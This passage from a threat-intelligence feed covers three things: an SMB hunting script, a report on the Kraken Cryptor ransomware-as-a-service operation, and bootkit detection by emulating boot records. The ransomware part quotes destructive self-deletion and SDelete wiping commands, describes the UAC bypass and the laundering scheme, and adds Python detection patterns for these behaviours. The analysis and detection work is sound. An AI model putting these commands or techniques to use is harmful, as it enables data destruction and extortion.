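    Each alert is (src, dst, proto, port, severity)."""
    alerts = []
    for r in records:
        key = (r["proto"].lower(), int(r["id.resp_p"]))
        if key not in SMB_PORTS:
            continue
        src, dst = r["id.orig_h"], r["id.resp_h"]
        if is_external(src) or not is_external(dst):
            continue  # only internal -> external matters for this hunt
        severity = "high" if dst in REPORT_SMB_IOCS else "medium"
        alerts.append((src, dst, key[0], key[1], severity))
    return alerts


def summarize_by_source(alerts):
    """Group alerts per internal host so one phished user shows up as one case."""
    summary = defaultdict(set)
    for src, dst, proto, port, _sev in alerts:
        summary[src].add((dst, proto, port))
    return dict(summary)


if __name__ == "__main__":
    found = find_external_smb(parse_conn_log(SAMPLE_CONN_LOG))
    for src, targets in summarize_by_source(found).items():
        print(f"{src}: outbound SMB/NetBIOS to external hosts {sorted(targets)}")
```

Any hit at all is worth a look, because a workstation has no business authenticating to SMB servers on the internet; the medium-severity cases are where the attacker's infrastructure is not yet on an indicator list.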

To view a full list of the associated indicators of compromise, download the appendix.

[1] P4wnP1 is a highly customizable USB attack platform based on a Raspberry Pi Zero computer.

[2] F-Secure published research in August 2016 on their investigations into the NanHaiShu RAT, which has since been attributed to TEMP.Periscope (Leviathan).

The post Chinese Threat Actor TEMP.Periscope Targets UK-Based Engineering Company Using Russian APT Techniques appeared first on Recorded Future.


Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals

Insikt Group

Co-Authored by Marc Rivero López and John Fokker of McAfee


Scope Note: Insikt Group used the Recorded Future product and dark web analysis to track the activity of threat actor ThisWasKraken, who operates the Kraken Cryptor ransomware affiliate program on a top-tier Russian-speaking criminal forum.

Insikt Group collaborated with researchers at McAfee. Ransomware continually represents a major risk to organizations, and the target audience of this research includes day-to-day security practitioners as well as executive decision makers.


Executive Summary

Kraken Cryptor is a ransomware-as-a-service (RaaS) affiliate program that was introduced on August 16, 2018, on a top-tier Russian-speaking cybercriminal forum by the threat actor ThisWasKraken. Kraken Cryptor has gained popularity among members of the dark web, has been used to target users of the popular antivirus program SuperAntiSpyware, and has also been distributed through the Fallout exploit kit.

Key Judgments

  • The Kraken Cryptor ransomware was first seen in the wild in August 2018.
  • Kraken is distributed by members of an affiliate program operated by ThisWasKraken, who is only active on Russian criminal forums.
  • To distribute malware, ThisWasKraken and/or its affiliates likely use the Fallout exploit kit.
  • We have identified that ThisWasKraken is using online casino BitcoinPenguin to launder illicitly gained funds.
  • Insikt Group assesses with a high degree of confidence that ThisWasKraken works within a team, whose members could be residing in Iran, Brazil, or former Soviet bloc countries.

Background

The Kraken Cryptor ransomware is a connectionless strain of ransomware that communicates with victims via email in place of any command and control (C2) infrastructure or landing pages. Kraken was first observed in the wild in August 2018 and gained notoriety when it was distributed from the compromised website of SuperAntiSpyware, disguised as the antivirus program [1]. Kraken has also been distributed to victims via spam and malvertising campaigns, some of which redirect to the Fallout exploit kit for the final installation phase.

Insikt Group has attributed the Kraken Cryptor ransomware to the threat actor ThisWasKraken, who operates the affiliate program that gives other actors access to Kraken for distribution. ThisWasKraken is relatively new to the dark web and is exclusively active on a Russian criminal forum, where the actor registered on August 12, 2018. The actor communicates using Russian and English; however, the analysis of their forum posts indicates that ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses automated translation services, as is evident from the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they consistently make mistakes in both sentence structure and spelling.

Kraken Cryptor Advertisement

Advertisement for the Kraken Cryptor v2 affiliate program on a criminal forum.

The Kraken Cryptor ransomware is not sold to users on a one-time basis. It is instead operated as an affiliate program that distributes builds of the ransomware to its participants, who in turn repay a percentage of the income earned from ransom payments. This technique of ransomware distribution, known as ransomware-as-a-service (RaaS), is commonly used on the dark web by cybercriminals because of its efficiency. ThisWasKraken calls the service the Kraken Cryptor v2 affiliate program, or Kraken ransomware-as-a-service, which was last updated on October 21. The latest version of the Kraken Cryptor is v.2.0.7.

Kraken Cryptor Ransom Note

Kraken Cryptor ransomware v.2.0.7 ransom note with instructions for how to decrypt infected files.

At the time of this report, the Kraken Cryptor ransomware-as-a-service (RaaS) required all potential affiliate partners to pay $50 per payload. Below are some of the terms and conditions of the affiliate program:

  • Affiliates receive 80 percent of the paid ransom.
  • The program can reject any member or candidate without explanation.
  • Affiliates receive a 24/7 support service.
  • Submitting Kraken sample files to antivirus services is forbidden.
  • The service provides no refunds for purchased payloads.

Kraken Cryptor Ransomware

ThisWasKraken introduced the Kraken Cryptor ransomware on a criminal forum on August 16, 2018.

Threat Analysis

According to ThisWasKraken, the Kraken Cryptor RaaS does not allow the targeting of the following former Soviet bloc countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Kyrgyzstan
  • Kazakhstan
  • Lithuania
  • Latvia
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

In addition to the countries listed above, the latest samples of Kraken that have been identified in the wild no longer affect victims in Syria, Brazil, and Iran, suggesting that ThisWasKraken (or their associates) may have some connection to Brazil and Iran, though this is not confirmed. It is likely that Syria was added following the plea for help from a victim whose computer was infected by another ransomware called GandCrab.

According to the map of infections provided below, we can still see a minor level of infections in excluded countries, despite specific fail-safe controls put in place by Kraken developers.

Each affiliate of Kraken Cryptor RaaS receives a unique build of Kraken and must send the following information to ThisWasKraken to be configured:

  • A primary email address to communicate with victims
  • An alternative email address to communicate with victims
  • A ransom amount in Bitcoin, usually varying from 0.075 to 1.25 BTC
  • A list of countries not to target

The analysis of the actor’s communication suggests that ThisWasKraken is likely part of a team and not personally involved in the development of the ransomware directly. The actor’s role is customer facing, which is accomplished through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at the email address teamxsupport@protonmail[.]com.

Bitcoin is the only currency the affiliate program uses, and Insikt Group identified several wallets associated with the operation. Interestingly, it appears that Kraken’s developers chose BitcoinPenguin, an online gambling site, as the primary money laundering conduit. Although not unheard of, it is still very uncommon for criminal actors — specifically ransomware operators — to depart from more traditional cryptocurrency exchangers when laundering stolen funds. It is likely that one of the decisive factors for this unusual choice was that BitcoinPenguin does not require any identity verification of its members, allowing anyone to maintain an anonymous cryptocurrency wallet there. Cryptocurrency exchangers are continuing to stiffen their registration rules in response to regulatory demands, but online crypto casinos do not have to follow the same “know your customer” (KYC) guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin Transactions

Bitcoin transactions associated with Kraken and analyzed with the Crystal Blockchain software.

On October 4, 2018, BleepingComputer reported that the Fallout exploit kit was being used to deliver the Kraken Cryptor ransomware v.1.5. It should be noted that on multiple occasions, ThisWasKraken mentioned the Fallout exploit kit and praised it for its high infection rate. At one point, ThisWasKraken even stated, “One of our partners joined the Fallout exploit kit, which is good for us.” Also, other forum messages indicate that ThisWasKraken purchased hijacked web traffic, which may be the same traffic responsible for Kraken infections from the Fallout exploit kit.

Web Traffic Graphic

Graphic posted by ThisWasKraken showing web traffic used to distribute the Kraken Cryptor RaaS by country.

Below are the technical specifications of the Kraken Cryptor ransomware v.2.0.7 posted by ThisWasKraken on October 21, 2018:

  • The ransomware is written in C# (.NET Framework v. 3.5).
  • The ransomware works offline and supports communication via email.
  • The size of the payload is around 85 KB, but antivirus analysis indicates that the payload size often reaches up to 94 KB.
  • Kraken primarily targets Windows OS versions 8, 8.1, and 10.
  • Kraken has a high speed of encryption.
  • There is no file size limit for the encryption process.
  • The ransomware collects system information when victims are online.
  • Kraken uses a hybrid encryption algorithm, including AES-128/256 (CBC mode), as well as other ciphers (RSA, Salsa20, RC4).
  • The ransomware uses a smart obfuscation encryption method to target random positions of files, including network sharing encryption.
  • The ransomware encrypts storage devices on shared networks.
  • It is impossible to recover without paying the ransom.
  • Anti-debugging and anti-forensics tools are included in the package.
  • Ransom messages are available in 15 languages in HTML and TXT formats.
  • “Canary trap” anti-ransomware bypass methods are applied to identify key leaks.
  • Infection statistics are based on IPs.

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable (FUD) from antivirus software. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward to the victim. After the victim pays the full ransom, the affiliate member sends 20 percent of the received payment to the RaaS to get a decryptor key, which is then forwarded on to the victim. This system ensures the affiliate pays their percentage to the affiliate program and does not simply pocket the full amount for themselves.

Technical Analysis

The following technical analysis was conducted by McAfee’s Advanced Threat Research team and the results were shared with Recorded Future.

The Kraken Cryptor ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals Suite, to wipe files, making file recovery harder.

Kraken Cryptor Infection Scheme

The Kraken Cryptor infection scheme through the Fallout exploit kit.

The ransomware implements a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

Ransomware Using Windows Event Viewer

The ransomware uses Windows Event Viewer to bypass UAC.

The technique is well explained in an article by blogger enigma0x3.

McAfee analyzed an early subset of Kraken ransomware samples and determined that they were still in the testing phase, adding and removing options. The ransomware implemented a “protection” to delete itself during the infection phase:

  • “C:\Windows\System32\cmd.exe” /C ping 127.0.0.1 -n 3 > NUL&&del /Q /F /S C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops the ransom note demanding that the victim pay to recover them. Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken, delivered by the exploit kit, bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

Exploit Kit Delivering Binary

The binary delivered by the exploit kit.

During the compilation of the first versions, the authors of the binary forgot to delete the PDB reference, revealing that the file has a relationship with Kraken Cryptor.

Ransomware Early Version

An early version of the ransomware with the path on Disk C.

The early versions contained the following path:

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Later versions “dropped” the PDB path together with the Kraken loader.

Using Sysinternals Tools for Harder File Recovery

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken Cryptor

Kraken Cryptor v.1.6 with SDelete bat file makes file recovery harder.

Kraken downloads SDelete from the Sysinternals website, adds the registry key that accepts the EULA (so no pop-up appears), and executes it with the following arguments:

sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option, and finally, rebooting the system after 300 seconds.
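Detection logic for the three behaviours described above (ping-delay self-deletion, SDelete free-space zeroing, and a child process spawned by Event Viewer), written as an added example that is not part of the Recorded Future or McAfee analysis. The events are constructed Sysmon-style process-creation records; the Event Viewer check assumes that eventvwr.exe normally launches only mmc.exe, which the write-up itself does not state.

```python
"""Process-creation triage for the Kraken Cryptor behaviours described above.

Input: Sysmon-style process-creation events (ParentImage, Image, CommandLine).
Patterns follow the text: cmd.exe ping-delay self-deletion, SDelete free-space
zeroing ("sdelete.exe -c -z C"), and the Event Viewer UAC bypass, for which the
observable assumed here is eventvwr.exe launching a child other than mmc.exe.
"""
import re
from typing import Dict, List, Tuple

# "cmd.exe /C ping 127.0.0.1 -n 3 > NUL&&del /Q /F /S <self>": the ping acts as
# a sleep so the file is no longer locked by the parent when del runs.
SELF_DELETE_RE = re.compile(
    r"ping\s+127\.0\.0\.1\s+-n\s+\d+\s*>\s*nul\s*&&\s*del\b", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_flag(cmdline: str, flag: str) -> bool:
    """Whole-token match so '-c' does not hit inside '-cleanup' or a path."""
    return re.search(rf"(?<!\S){re.escape(flag)}(?!\S)", cmdline, re.IGNORECASE) is not None


def triage_event(event: Dict[str, str]) -> List[str]:
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    if image == "cmd.exe" and SELF_DELETE_RE.search(cmdline):
        hits.append("self-deletion: ping delay chained into del")
    # SDelete -c cleans free space and -z zeroes it; together they destroy
    # remnants of deleted files that carving tools would otherwise recover.
    if image.startswith("sdelete") and _has_flag(cmdline, "-c") and _has_flag(cmdline, "-z"):
        hits.append("SDelete free-space zeroing (anti-forensics)")
    if parent == "eventvwr.exe" and image != "mmc.exe":
        hits.append("eventvwr.exe spawned a non-mmc child (UAC bypass indicator, assumed)")
    return hits


def triage_events(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every event that matched at least one pattern."""
    results = []
    for i, event in enumerate(events):
        hits = triage_event(event)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry, not real logs. Paths follow the write-up's examples;
# "dropped.exe" is a placeholder name.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 3 > NUL&&del /Q /F /S '
                    r"C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\Public\sdelete.exe",
     "CommandLine": "sdelete.exe -c -z C"},
    {"ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Users\Public\dropped.exe",
     "CommandLine": r"C:\Users\Public\dropped.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: delay without del
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /C ping 127.0.0.1 -n 3 > NUL"},
    {"ParentImage": r"C:\Windows\System32\eventvwr.exe",  # benign: normal Event Viewer
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"C:\Windows\system32\mmc.exe C:\Windows\system32\eventvwr.msc /s"},
]

if __name__ == "__main__":
    for index, hits in triage_events(SAMPLE_EVENTS):
        print(index, hits)
```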

Netguid Comparison

Earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, McAfee found additional samples of the Kraken loader on VirusTotal:

Kraken Cryptor

Additional hash values found on VirusTotal.

Not only did the loader have a specific netguid, but the compiled versions of Kraken also shared a netguid, making it possible to continue hunting samples:

Additional Hash Values

Additional hash values detected.

Comparing Versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Kraken Cryptor Configuration File

Image of the configuration file of Kraken Cryptor.

Based on the configuration file, McAfee discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the configuration files from all of the versions, McAfee built the following overview of features (the checkmark means the feature is present):

Feature Overview

Overview of the features of all identified versions of the ransomware.

All of the versions we examined mostly contain the same options, differing only in some of the anti-virtualization and anti-forensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme and is covered later.

Other differences in Kraken’s configuration file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method for cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version (the checkmark means the country appears on the list):

Exclusion List

Exclusion list by country and version: the countries that the ransomware is not allowed to attack.

All of the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.2

Version 2.0.7

The most recent version examined comes with a different configuration scheme:

Configuration Version

Configuration version of the Kraken Cryptor v. 2.0.7.

This release has more options. McAfee expects this malware will be more configurable than other active versions.

APIs and Statistics

One of the new features is a public API to track the number of victims:

Public API

Public API to track the number of victims. Source: Bleeping Computer

Another API is a hidden service to track certain statistics:

Statistics Collection

Statistics collection and monitoring site that likely does not have the functionality of a typical C2 panel.

The Onion URL can easily be found in the binary:

Detected URL

kraken656kn6wyyx[.]onion URL detected using the API.

The endpoint and browser that Kraken uses is hardcoded in the configuration file:

Configuration File

The configuration file contains data about the endpoint and browser.

Kraken gathers the following information from every infection:

  • Status
  • Operating System
  • Username
  • Hardware ID
  • IP Address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken Infrastructure

In versions 1.2 through 2.04, Kraken contacts blasze[.]tk to download additional files. The site has Cloudflare protection to mitigate DDoS attacks.

Downloading Additional Files

Kraken Cryptor used blasze[.]tk website to download additional files for versions 1.2 through 2.04.

This domain is not accessible from the following countries:

Countries Blocking Domain

Countries that block the domain blasze[.]tk.

Insikt Group was able to obtain a sample of the Kraken Cryptor ransomware and successfully encrypt and then decrypt a 64-bit Windows 7 machine. The encryption phase locked all target files, and, in those directories, placed a ransom note in HTML format with instructions for the victim. The note first instructs the victim to buy Bitcoin through LocalBitcoins.com or BestBitcoinExchange.io, and then to contact the primary or secondary email address listed for further instructions. Obviously, the infected machine still has access to its web browsers, so the victim can communicate with the attacker and pay the ransom.

Ransom Note

Partial screenshot of the ransom note left by Kraken.

When the victim pays the ransom, they receive an email containing a link for the file-sharing service Uploadfiles.io that in turn downloads two files, Decryptor.exe and Private.txt. Private.txt contains two datasets: a private key and a private IV. When the program Decryptor.exe is executed, it requires the victim to copy and paste the private key and private IV into the respective fields in order to decrypt the files on their machine.

Kraken Decryptor

Screenshot of the Kraken decryptor sent to the victim after payment.

Outlook

The Kraken Cryptor ransomware is a 32-bit malware written using .NET Framework and protected with SmartAssembly, a commercial obfuscator that protects an application against reverse engineering. The malware is fully customizable through a JavaScript Object Notation (JSON) file that is likely generated by its builder.

The existence of the list of countries that are not allowed to be targeted indicates that members of this possible international hacking group may reside in those nations. Such behavior is usually a precaution taken by criminals who do not want to be pursued by local law enforcement agencies. Considering that ThisWasKraken is not a native English or Russian speaker, the actor may reside in Brazil or Iran.

To view a full list of the associated indicators of compromise, download the appendix.

1It should be noted that the Kraken Cryptor ransomware is different from the Kraken ransomware widely distributed in 2016, and is not linked to another ransomware strain detected in 2013 that used the “.kraken” extension.

2McAfee believes that the creators of Kraken had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.

The post Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals appeared first on Recorded Future.


BIOS Boots What? Finding Evil in Boot Code at Scale!

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

| Enterprise Size (# hosts) | Avg # Unique Boot Records (md5) |
|---|---|
| 100-1000 | 428 |
| 1000-10000 | 4,738 |
| 10000+ | 8,717 |

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing each assembly instruction as it executes to ultimately arrive at the “execution hash”.


Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.
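The three indicators the post describes (the MBR subsection hash, the execution hash with its fleet-rarity check, and writes into the IVT and BDA) as one runnable example, added here and not FireEye's code. The MBR image, mnemonic traces and write lists are constructed; treating bytes 218-223 as the Windows disk timestamp and 0040:0013h as the BDA memory-size word are assumptions from the standard real-mode layout, not statements from the post.

```python
"""Boot-record triage: MBR subsection hash, execution hash, fleet rarity and
IVT/BDA write detection, as described in this post.

All inputs are constructed: an MBR image built in-line, instruction-mnemonic
traces standing in for emulator output, and (segment, offset, size) memory
writes of the kind an emulator memory hook reports.
"""
import hashlib
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Real-mode layout in linear addresses. 0000:0000h..0000:03FCh holds the 256
# four-byte IVT entries; the BDA starts at 0040:0000h (linear 0x400).
IVT_START, IVT_END = 0x0000, 0x0400
BDA_START, BDA_END = 0x0400, 0x0500
# Assumption (standard BDA layout, not stated in the post): the word at
# 0040:0013h is the conventional memory size in KB that int 12h reports.
BDA_MEMSIZE_KB = 0x0413


def mbr_subsection_hash(mbr: bytes) -> str:
    """md5(offset[0:218] + offset[224:440]) from the post. Bytes 218-223 and
    440-511 are skipped: assumed to be the Windows disk timestamp, and the disk
    signature, partition table and 0x55AA marker, all of which vary per machine."""
    if len(mbr) != 512:
        raise ValueError("an MBR is a single 512-byte sector")
    return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()


def execution_hash(mnemonics: Iterable[str]) -> str:
    """Hash only the mnemonic of each executed instruction, e.g.
    md5('and' + 'mov' + 'shl' + 'or'); operands are deliberately excluded so
    functionally identical code with different data folds to one hash."""
    return hashlib.md5("".join(mnemonics).encode("ascii")).hexdigest()


def rare_execution_hashes(host_hashes: Dict[str, str], max_hosts: int = 3) -> Dict[str, List[str]]:
    """Second indicator from the post: an execution hash seen on only a few hosts."""
    counts = Counter(host_hashes.values())
    return {h: sorted(host for host, hh in host_hashes.items() if hh == h)
            for h, n in counts.items() if n <= max_hosts}


def linear(segment: int, offset: int) -> int:
    return ((segment << 4) + offset) & 0xFFFFF


def classify_writes(writes: Iterable[Tuple[int, int, int]]) -> List[str]:
    """Third indicator: memory writes that land in the IVT or the BDA."""
    findings = []
    for seg, off, size in writes:
        start = linear(seg, off)
        end = start + size
        if start < IVT_END and end > IVT_START:
            vector = max(start, IVT_START) // 4        # each IVT entry is 4 bytes
            findings.append(f"IVT hook: int {vector:02X}h vector modified")
        elif start < BDA_END and end > BDA_START:
            if start <= BDA_MEMSIZE_KB < end:
                findings.append("BDA write: reported memory size changed")
            else:
                findings.append(f"BDA write at 0040:{start - BDA_START:04X}h")
    return findings


# ---- constructed sample inputs ----
def _sample_mbr(disk_signature: bytes, timestamp: bytes) -> bytes:
    # cli; xor ax,ax; mov ss,ax; mov sp,7C00h  then NOP padding to 440 bytes
    code = bytes([0xFA, 0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C]).ljust(440, b"\x90")
    code = code[:218] + timestamp + code[224:]           # per-machine bytes 218-223
    return code + disk_signature + b"\x00\x00" + b"\x00" * 64 + b"\x55\xAA"


MBR_A = _sample_mbr(b"\x11\x22\x33\x44", b"\x00\x00\x01\x02\x03\x04")
MBR_B = _sample_mbr(b"\xAA\xBB\xCC\xDD", b"\x00\x00\x09\x08\x07\x06")

# In a real trace the standard loader runs on every host with differing operands;
# a hooking record executes a different instruction sequence.
TRACE_STANDARD = ["cli", "xor", "mov", "mov", "sti", "mov", "int", "jmp"]
TRACE_HOOKING = ["cli", "xor", "mov", "mov", "mov", "mov", "sti", "int", "jmp"]

HOST_HASHES = {f"host{i:03d}": execution_hash(TRACE_STANDARD) for i in range(50)}
HOST_HASHES["host777"] = execution_hash(TRACE_HOOKING)

BENIGN_WRITES = [(0x0000, 0x7C00, 512), (0x0000, 0x0600, 512)]        # self-relocation
HOOK_WRITES = [(0x0000, 0x004C, 4), (0x0040, 0x0013, 2), (0x9F00, 0x0000, 512)]


if __name__ == "__main__":
    print(mbr_subsection_hash(MBR_A) == mbr_subsection_hash(MBR_B))
    print(rare_execution_hashes(HOST_HASHES))
    print(classify_writes(HOOK_WRITES))
```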

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

